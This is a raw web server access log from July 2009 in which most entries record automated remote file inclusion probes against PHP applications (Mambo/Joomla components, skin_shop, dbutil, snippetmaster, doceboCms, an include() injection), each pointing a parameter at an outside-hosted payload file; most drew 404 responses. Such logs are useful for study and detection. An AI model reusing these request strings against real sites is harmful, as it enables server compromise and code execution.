115.118.231.229 - - [28/Jul/2009:05:20:48 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
115.118.231.229 - - [28/Jul/2009:05:20:50 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
115.118.231.229 - - [28/Jul/2009:05:21:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
115.118.231.229 - - [28/Jul/2009:05:21:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; Media Center PC 5.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)"
222.236.47.192 - - [28/Jul/2009:05:21:41 -0400] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:21:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.210.178 - - [28/Jul/2009:05:24:51 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.106.210.178 - - [28/Jul/2009:05:24:51 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://infozack.com/images/img08.jpg???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
92.50.143.90 - - [28/Jul/2009:05:25:04 -0400] "GET /logs/access_log.Q109050800////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
92.50.143.90 - - [28/Jul/2009:05:25:05 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 454 "-" "libwww-perl/5.803"
92.50.143.90 - - [28/Jul/2009:05:25:05 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 200 11341 "-" "libwww-perl/5.803"
92.50.143.90 - - [28/Jul/2009:05:25:14 -0400] "GET /logs/access_log.Q109071200////?_SERVER[DOCUMENT_ROOT]=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
209.59.12.99 - - [28/Jul/2009:05:26:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.32.2 - - [28/Jul/2009:05:26:45 -0400] "GET //config/dbutil.bck.php?confdir=http://www.vivitorpedoparavoce.kit.net/remember.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
65.254.32.2 - - [28/Jul/2009:05:26:45 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://www.vivitorpedoparavoce.kit.net/remember.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
65.254.32.2 - - [28/Jul/2009:05:26:45 -0400] "GET /logs/access_log.Q109070300%20%20//config/dbutil.bck.php?confdir=http://www.vivitorpedoparavoce.kit.net/remember.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:05:28:52 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:05:28:52 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:05:28:53 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.200.37.14 - - [28/Jul/2009:05:29:01 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.200.37.14 - - [28/Jul/2009:05:29:01 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.200.37.14 - - [28/Jul/2009:05:29:01 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.222.40.12 - - [28/Jul/2009:05:29:18 -0400] "GET //snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.222.40.12 - - [28/Jul/2009:05:29:18 -0400] "GET /logs//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:05:29:38 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.222.40.12 - - [28/Jul/2009:05:29:38 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:29:42 -0400] "GET /logs/access_log.Q109051800/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:29:42 -0400] "GET /logs/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:29:42 -0400] "GET /write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:30:11 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:30:11 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:30:11 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:30:15 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:31:06 -0400] "GET /logs/access_log.Q109051300/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:31:40 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:31:40 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:31:41 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:31:42 -0400] "GET /logs/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.200.37.14 - - [28/Jul/2009:05:31:42 -0400] "GET /logs/access_log.Q109061800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:31:43 -0400] "GET /write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:31:43 -0400] "GET /logs/access_log.Q109051800/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:31:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.169.137.253 - - [28/Jul/2009:05:31:45 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.200.37.14 - - [28/Jul/2009:05:31:48 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:05:32:28 -0400] "GET /logs/access_log.Q109062500%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.243.71 - - [28/Jul/2009:05:32:37 -0400] "GET /logs/access_log.Q109051300/write.php?dir=http://lawboards.semanticrestructuring.com//images/smile/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
98.116.62.213 - - [28/Jul/2009:05:32:51 -0400] "GET /logs/access_log.Q109060800%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:08 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:08 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:08 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:11 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:12 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:12 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:12 -0400] "GET /logs/access_log.Q109070300%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:20 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:20 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:21 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:33:21 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
65.254.32.2 - - [28/Jul/2009:05:34:08 -0400] "GET /logs/access_log.Q109070300//config/dbutil.bck.php?confdir=http://www.vivitorpedoparavoce.kit.net/remember.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:14 -0400] "GET /logs/access_log.Q109061000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:14 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:14 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:18 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:18 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:18 -0400] "GET /logs/access_log.Q109061000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:19 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:19 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:34:19 -0400] "GET /logs/access_log.Q109061000%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:39 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:39 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:40 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:42 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:52 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:52 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:52 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:34:53 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
195.190.166.41 - - [28/Jul/2009:05:35:10 -0400] "GET /logs/access_log.Q109051300/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.blendcolours.com/components/com_user/views/user/tmpl/r0x-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
81.169.137.253 - - [28/Jul/2009:05:35:26 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:35:26 -0400] "GET /logs/access_log.Q109070300%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.169.137.253 - - [28/Jul/2009:05:35:26 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:36:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.169.137.253 - - [28/Jul/2009:05:37:48 -0400] "GET /logs/access_log.Q109070300%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
70.53.112.120 - - [28/Jul/2009:05:39:24 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
70.53.112.120 - - [28/Jul/2009:05:39:30 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
70.53.112.120 - - [28/Jul/2009:05:39:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.103.16.12 - - [28/Jul/2009:05:39:38 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:39:38 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:39:38 -0400] "GET /logs/access_log.Q109061000/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
70.53.112.120 - - [28/Jul/2009:05:39:39 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
81.169.137.253 - - [28/Jul/2009:05:40:34 -0400] "GET /logs/access_log.Q109070300%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://dildo.rs/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.236.47.192 - - [28/Jul/2009:05:40:55 -0400] "GET /logs/access_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [28/Jul/2009:05:41:21 -0400] "GET /logs/access_log.Q109053000%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:41:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.200.37.14 - - [28/Jul/2009:05:44:01 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://labor.labcei.unimore.it/68049/maillist/maillist/uploads/mail/office1.jpg??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.249.71.204 - - [28/Jul/2009:05:44:09 -0400] "GET /logs/access_log.Q108040400 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.195.69.64 - - [28/Jul/2009:05:45:19 -0400] "GET /logs/access_log.Q109070300//config/dbutil.bck.php?confdir=http://indo.home.ro/idaaa.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
213.195.69.64 - - [28/Jul/2009:05:45:19 -0400] "GET //config/dbutil.bck.php?confdir=http://indo.home.ro/idaaa.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
213.195.69.64 - - [28/Jul/2009:05:45:19 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://indo.home.ro/idaaa.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
66.232.145.150 - - [28/Jul/2009:05:45:28 -0400] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
66.232.145.150 - - [28/Jul/2009:05:45:28 -0400] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
66.232.145.150 - - [28/Jul/2009:05:45:28 -0400] "GET //standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
66.232.145.150 - - [28/Jul/2009:05:45:28 -0400] "GET /logs/access_log.Q109060100%20//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
66.232.145.150 - - [28/Jul/2009:05:45:28 -0400] "GET /logs//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
66.232.145.150 - - [28/Jul/2009:05:45:28 -0400] "GET /logs/access_log.Q109060100%20//standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://220.130.180.180/aDu/ManieZ.jpg???? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
94.75.245.36 - - [28/Jul/2009:05:45:43 -0400] "GET /logs/access_log.Q109051300///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 277 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:05:45:43 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 250 "-" "libwww-perl/5.823"
94.75.245.36 - - [28/Jul/2009:05:45:43 -0400] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jobecabos.com.br/site/images/blank.png?? HTTP/1.1" 404 255 "-" "libwww-perl/5.823"
200.103.16.12 - - [28/Jul/2009:05:46:26 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:46:26 -0400] "GET /logs/access_log.Q109052400%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
200.103.16.12 - - [28/Jul/2009:05:46:26 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://tuxs.altervista.org/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:05:46:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
